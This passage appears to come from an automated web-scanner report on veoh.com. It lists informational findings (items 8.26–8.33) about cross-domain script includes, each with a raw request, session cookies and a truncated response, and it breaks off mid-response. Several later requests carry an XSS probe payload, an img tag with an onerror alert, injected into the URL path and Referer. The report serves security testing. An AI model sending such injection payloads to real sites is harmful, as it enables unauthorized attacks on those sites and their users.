Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 134399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20754927ZpAfSEzt&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768555"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 134852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20756872Ta2Y7sDB&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768523"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.27. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:57 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 134505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20757961gnh48zmS&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768537"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.28. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 132755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20758438BTte3QQz&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768558"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.29. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=15
Content-Length: 94311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768551"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

8.30. http://www.veoh.com/browse/videos/category/action_adventure4957f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 57369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768574"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.31. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768573"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.32. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:21:59 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768119"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.33. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:21 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
